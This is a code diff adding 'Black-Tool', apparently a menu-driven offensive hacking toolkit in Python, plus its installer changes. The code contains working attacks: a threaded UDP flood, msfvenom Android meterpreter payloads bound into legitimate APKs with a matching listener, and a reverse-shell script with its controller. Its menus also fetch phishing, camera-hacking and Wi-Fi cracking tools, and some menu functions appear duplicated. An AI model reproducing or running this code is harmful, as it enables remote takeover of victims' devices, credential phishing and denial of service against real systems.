print("{2}.Wifite") + print("{3}.Airattackit") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Wireless-Attack# ")) + if command == "1": + self.clear() + print("Installing Reaver") + reaver_ins = subprocess.getoutput("git clone https://github.com/t6x/reaver-wps-fork-t6x reaver/") + input("Press Enter...") + self.wireless_attack() + elif command == "2": + self.clear() + print("Installing Wifite") + wifite_ins = subprocess.getoutput("git clone https://github.com/derv82/wifite") + input("Press Enter...") + self.wireless_attack() + elif command == "3": + self.clear() + print("Installing Airattackit") + airattackit_ins = subprocess.getoutput("git clone https://github.com/JoyGhoshs/Airattackit") + input("Press Enter...") + self.wireless_attack() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.wireless_attack() + def sniffing_spoofing(self): + self.clear() + self.banner() + print("\n{1}.Say Cheese") + print("{2}.PyPhisher") + print("{3}.Storm-Breaker") + print("{4}.Setoolkit") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Sniffing_Spoofing# ")) + if command == "1": + self.clear() + print("Installing Say Cheese") + reaver_ins = subprocess.getoutput("git clone https://github.com/hangetzzu/saycheese") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "2": + self.clear() + print("Installing PyPhisher") + wifite_ins = subprocess.getoutput("git clone https://github.com/KasRoudra2/PyPhisher") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "3": + self.clear() + print("Installing Storm-Breaker") + airattackit_ins = subprocess.getoutput("git clone https://github.com/ultrasecurity/Storm-Breaker") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "4": + self.clear() + print("Installing Setoolkit") + set_ins = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.sniffing_spoofing() + def wireless_attack(self): + self.clear() + self.banner() + print("\n{1}.Reaver") + print("{2}.Wifite") + print("{3}.Airattackit") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Wireless-Attack# ")) + if command == "1": + self.clear() + print("Installing Reaver") + reaver_ins = subprocess.getoutput("git clone https://github.com/t6x/reaver-wps-fork-t6x reaver/") + input("Press Enter...") + self.wireless_attack() + elif command == "2": + self.clear() + print("Installing Wifite") + wifite_ins = subprocess.getoutput("git clone https://github.com/derv82/wifite") + input("Press Enter...") + self.wireless_attack() + elif command == "3": + self.clear() + print("Installing Airattackit") + airattackit_ins = subprocess.getoutput("git clone https://github.com/JoyGhoshs/Airattackit") + input("Press Enter...") + self.wireless_attack() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.wireless_attack() + def sniffing_spoofing(self): + self.clear() + self.banner() + print("\n{1}.Say Cheese") + print("{2}.PyPhisher") + print("{3}.Storm-Breaker") + print("{4}.Setoolkit") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Sniffing_Spoofing# ")) + if command == "1": + self.clear() + print("Installing Say Cheese") + reaver_ins = subprocess.getoutput("git clone https://github.com/hangetzzu/saycheese") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "2": + self.clear() + print("Installing PyPhisher") + wifite_ins = subprocess.getoutput("git clone https://github.com/KasRoudra2/PyPhisher") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "3": + self.clear() + print("Installing Storm-Breaker") + airattackit_ins = subprocess.getoutput("git clone https://github.com/ultrasecurity/Storm-Breaker") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "4": + self.clear() + print("Installing Setoolkit") + set_ins = subprocess.getoutput("git clone https://github.com/trustedsec/social-engineer-toolkit") + input("Press Enter...") + self.sniffing_spoofing() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.sniffing_spoofing() + def web_attack(self): + self.clear() + self.banner() + print("\n{1}.BruteX") + print("{2}.SkipFish") + print("{3}.Blazy") + print("{4}.PortScanner") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Web-Hacking# ")) + if command == "1": + self.clear() + print("Installing BruteX") + cupp_ins = subprocess.getoutput("git clone https://github.com/1N3/BruteX") + print("Press Enter...") + self.web_attack() + elif command == "2": + self.clear() + print("Installing SkipFish") + ncrack_ins = subprocess.getoutput("git clone https://github.com/spinkham/skipfish") + input("Press Enter...") + self.web_attack() + elif command == "3": + self.clear() + print("Installing Blazy") + ncrack_ins = subprocess.getoutput("git clone https://github.com/s0md3v/Blazy") + input("Press Enter...") + self.web_attack() + elif command == "4": + self.portscan() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.web_attack() + def malware(self): + self.clear() + self.banner() + print("\n{1}.Android") + print("{2}.Windows") + print("{99}.Main Menu") + command = str(input(Style.BRIGHT + "\nBlack-Tool# ")) + if command == "1": + self.android_mal() + elif command == "2": + self.windows_mal() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.malware() + def dos(self): + self.clear() + self.banner() + try: + host = input("\nEnter Host: ") + ip = socket.gethostbyname(host) + port = input("Enter Port: ") + time.sleep(1) + self.clear() + print(f"{Fore.GREEN} Ip: {Fore.RED}{ip}{Fore.WHITE}") + time.sleep(1) + print(f"\n{Fore.GREEN} Port: {Fore.RED}{port}{Fore.WHITE}") + time.sleep(2) + UDP_PORT = port + bs = random._urandom(1490) + sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) + def run(k): + while True: + sock.sendto(bs,(ip,int(port))) + print(f"{Fore.GREEN}Send Packet To {Fore.RED}{ip}{Fore.WHITE}") + for i in range(10): + ch = threading.Thread(target=run, args=[i]) + ch.start() + except KeyboardInterrupt: + print("Ctrl + C\nDos Stopped!") + while True: + try_6 = input("\nTry Dos? [y/n] ") + if try_6 == "y": + self.dos() + elif try_6 == "n": + break + else: + continue + self.main_menu() + + def cam_hacking(self): + self.clear() + self.banner() + print("\n{1}.Cam Hacker") + print("{2}.Cam Dumper") + print("{3}.SEE U") + print("{4}.Cam Phish") + print("{99}.Back") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Camera-Hacking# ")) + if command == "1": + self.clear() + print("Installing Cam Hacker") + reaver_ins = subprocess.getoutput("git clone https://github.com/ANGELSECURITYTEAM/cam-hackers") + input("Press Enter...") + self.cam_hacking() + elif command == "2": + self.clear() + print("Installing Cam Dumper") + wifite_ins = subprocess.getoutput("git clone https://github.com/erfannoori/Cam-Dumper") + input("Press Enter...") + self.cam_hacking() + elif command == "3": + self.clear() + print("Installing See U") + airattackit_ins = subprocess.getoutput("git clone https://github.com/GloveB/Cam-Hack SEE-U/") + input("Press Enter...") + self.cam_hacking() + elif command == "4": + self.clear() + print("Installing Cam Phish") + camphish_ins = subprocess.getoutput("git clone https://github.com/baradatipu/CamPhish") + input("Press Enter...") + self.cam_hacking() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.cam_hacking() + def portscan(self): + self.clear() + self.banner() + host = input("\nEnter Host: ") + ip = socket.gethostbyname(host) + print(f"\n{host} IP: {ip}\n") + print("\n") + ports = [21,22,25,80,443] + for port in ports: + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + socket.setdefaulttimeout(1) + s.connect_ex((ip,port)) + if (s == 0): + print(f"{port} Is Open!") + else: + print(f"{port} Is Filter!") + s.close() + try_ = input("\nTry Again? [y/n] ") + if try_ == "y": + self.portscan() + else: + print("\nPress Enter...") + self.main_menu() + def android_mal(self): + self.clear() + self.banner() + print("\n{1}.Make Payload") + print("{2}.Start Listener") + print("{99}.Main Menu") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Malware/Android# ")) + if command == "1": + self.android_payload() + elif command == "2": + self.android_listener() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.android_mal() + + def android_payload(self): + self.clear() + self.banner() + host = input("\nEnter IP: ") + port = input("Enter Port: ") + payload_name = input("Enter Payload Name: ") + while True: + bind_q = input("Do You Have A Orginal File? [y/n] ") + if bind_q == "y": + orginal_file = input("Enter Orginal File: ") + make_payload = subprocess.getoutput(f"msfvenom -x {orginal_file} -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} -o {payload_name}.apk") + print(make_payload) + break + elif bind_q == "n": + make_payload = subprocess.getoutput(f"msfvenom -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} -o {payload_name}.apk") + print(make_payload) + break + else: continue + while True: + try_2 = input("Make Payload Again? [y/n] ") + if try_2 == "y": + self.android_payload() + elif try_2 == "n": + break + else: + continue + self.main_menu() + def android_listener(self): + self.clear() + self.banner() + host = input("\nEnter Host: ") + port = input("Enter Port: ") + os.system(f"msfconsole -x 'use multi/handler; set LHOST {host}; set LPORT {port}; set PAYLOAD android/meterpreter/reverse_tcp; exploit'") + while True: + try_3 = input("Try Listener Again? [y/n] ") + if try_3 == "y": + self.android_listener() + break + elif try_3 == "n": + break + else: + continue + self.android_mal() + def windows_mal(self): + self.clear() + self.banner() + print("\n{1}.Make Payload") + print("{2}.Start Listener") + print("{99}.Main Menu") + command = str(input(Style.BRIGHT + "\nBlack-Tool/Malware/Windows# ")) + if command == "1": + self.windows_payload() + elif command == "2": + self.windows_listener() + elif command == "99": + self.main_menu() + else: + print(f"{Fore.RED}\nWrong Key: {command}{Fore.WHITE}") + time.sleep(0.5) + try_ = input("Press Enter...") + self.windows_mal() + def windows_payload(self): + self.clear() + self.banner() + host = input("\nEnter Host: ") + port = input("Enter Port: ") + + payload_name = input("Enter Payload Name: ") + payload_code = f""" +from socket import * +from subprocess import getoutput +s = socket(2,1) + +s.connect(('{host}',{port})) + +print('Connected!') + +while True: + try: + data = s.recv(123456789).decode() + result = getoutput(data) + s.send(result.encode()) + except: + pass +s.close() + +""" + f = open(f"{payload_name}.py","w") + f.write(payload_code) + f.close() + # exe_out = subprocess.getoutput(f"pyinstaller --onefile {payload_name}.py --noconsole") + # print(exe_out) + print(f"\nYour Payload {payload_name} Created!\n") + while True: + try_4 = input("Make Payload Again? [y/n] ") + if try_4 == "y": + self.windows_payload() + elif try_4 == "n": + break + else: + continue + self.windows_mal() + + def windows_listener(self,host="",port=""): + self.clear() + self.banner() + host = input("\nEnter Host: ") + port = input("Enter Port: ") + ip = socket.gethostbyname(host) + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((host,int(port))) + s.listen(2) + print(f"Start Listener At {ip} Port: {port}") + c,addr = s.accept() + print("Client Connect!") + print("\nEnter Q To Exit!\n") + while True: + command = input(f"{ip}/$ ").encode() + if command == "q" or command == "Q": + c.close() + else: + c.send(command) + data = c.recv(123456789).decode() + print(data) + c.close() + while True: + try_5 = input("Try Listener? [y/n] ") + if try_5 == "y": + self.windows_listener() + elif try_5 == "n": + break + else: + continue + self.windows_mal() + def about(self): + self.clear() + sina_art = text2art("Sina Coder","tarty1") + print(sina_art) + print(f"\n{Fore.GREEN}This Tool Made by Sina Coder") + time.sleep(0.5) + print(f"\nGithub: https://github.com/mrprogrammer2938") + time.sleep(0.5) + print(f"\nInstagram: https://instagram.com/sina.coder{Fore.WHITE}") + time.sleep(0.5) + time.sleep(2) + input("Press Enter...") + self.main_menu() + def banner(self): + banner_art = text2art("Black Tool","tarty1") + print(banner_art) + print(f"{Fore.RED}Black-Tool 5.5.5 Sina Coder{Fore.WHITE}") + def clear(self): + if system() == "Linux" or system() == "Darwin": + os.system("clear") + else: + os.system("cls") + def exit_blacktool(self): + self.clear() + print(Back.GREEN + Fore.BLACK + "Thanks For Using :)") + Style.RESET_ALL + sys.exit() +if __name__ == "__main__": + + try: + BlackTool = Black_Tool() + BlackTool.main_menu() + except KeyboardInterrupt: + print("Ctrl + C") + print("Exit") + sys.exit() diff --git a/install.sh b/install.sh index c625348..a85e98e 100644 --- a/install.sh +++ b/install.sh @@ -1,25 +1,20 @@ -#!/usr/bin/env bash -# This code write by Mr.nope -# Black-Tool Installing -# Version 1.4.0 -if [[ "$(id -u)" -ne 0 ]]; then - echo "Please, Run This Programm as Root!" - exit 1 -fi -printf '\033]2;Installing\a' -clear -echo "Installing..." -sleep 2 -chmod a+x hack -chmod +x uninstall.sh -apt install xtitle -apt install lolcat -apt install python -apt install python3 -cp hack /usr/bin -echo -e "Press any key To continue..." -read -n 1 -echo "" -echo "Installing..., Finish...!" -echo "" -exit 1 +#!/bin/env bash +# Black-Tool v5.5.5 (New) +# Black-Tool Installing File +# +# Github: https://github.com/mrprogrammer2938 +# Instagram: https://instagram.com/sina.coder +# +clear +echo "" +echo "█▄▄ █░░ ▄▀█ █▀▀ █▄▀ ▄▄ ▀█▀ █▀█ █▀█ █░░ v5.5.5" +echo "█▄█ █▄▄ █▀█ █▄▄ █░█ ░░ ░█░ █▄█ █▄█ █▄▄" +echo "" +echo "Black-Tool Installing" +chmod -x hack +sudo apt install python +sudo apt install python3 +python -m pip install -r requirements.txt +echo "Finish...!" +echo "please Enter python hack" +exit diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..675374b --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +pyttsx3 +requests +colorama +cryptography +pybluez +googlesearch-python +ipapi +playsound +deep_translator +tk-tools +tkinterweb +ttkbootstrap +PIL +PyQt5 +pyqt5-tools diff --git a/uninstall.sh b/uninstall.sh deleted file mode 100644 index 3d8ab89..0000000 --- a/uninstall.sh +++ /dev/null @@ -1,13 +0,0 @@ -#!/usr/bin/python3 -# This code write by Mr.nope -if [[ "$(id -u)" -ne 0 ]]; then - echo "Please, Run This Programm as Root!" - exit 1 -fi -clear -echo "Uninstalling..." -sleep 2 -cd .. && rm -r Black-Tool && cd /usr/bin && rm -r hack -echo "Installing..., Finish...!" -echo "" -exit 1 \ No newline at end of file